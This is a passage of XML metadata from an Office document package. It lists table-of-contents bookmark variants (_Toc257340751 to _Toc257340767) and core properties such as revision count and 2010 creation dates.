      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>98</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340767</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>92</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340766</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>86</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340765</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>80</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340764</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>74</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340763</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>68</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340762</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>62</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340761</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507382</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>56</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340760</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>50</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340759</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>44</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340758</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>38</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340757</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>32</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340756</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>26</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340755</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>20</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340754</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340753</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340752</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310774</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc257340751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Hardword</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-03-30T11:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-03-30T11:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>